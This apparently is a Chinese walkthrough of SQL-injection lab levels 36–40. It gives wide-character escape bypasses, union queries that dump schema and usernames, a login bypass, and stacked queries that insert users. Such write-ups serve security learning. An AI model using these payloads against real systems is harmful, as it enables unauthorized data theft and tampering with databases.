第三十六關:mysql_real_escape_string寬字元+GET單引号
跟第三十三關基本一緻。
?id=-1%E6' union select 1,2,database() --+
?id=2&id=-1%E6' union select 1,2,database() --+
?id=2&id=-1%E6' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
?id=2&id=-1%E6' union select 1,2, group_concat(column_name) from information_schema.columns WHERE table_name=0x7573657273--+
#把users替換為十六進制0x7573657273
?id=2&id=-1%E6' union select 1,2, group_concat(username) from users--+
第三十七關:mysql_real_escape_string寬字元+POST單引号
跟第三十四關基本一緻。
# 平級越權
uname=%E6' or 1 limit 1,1#&passwd=1&submit=Submit
uname=%E6'union select 1,database()--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(schema_name) from information_schema.schemata--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(column_name) from information_schema.columns WHERE table_name=0x7573657273--+&passwd=1&submit=Submit
uname=%E6'union select 1,group_concat(username) from users--+&passwd=1&submit=Submit
第三十八關:堆疊注入+GET單引号
?id=0' union select 1,user(),database(); insert into users(username,password) values('stack', 'stack')--+
這樣就可以檢視到插入的
stack
使用者名:
第三十九關:堆疊注入+GET數值
?id=0 union select 1,user(),database(); insert into users(username,password) values('stack1', 'stack1')--+
第四十關:堆疊注入+GET數值
待續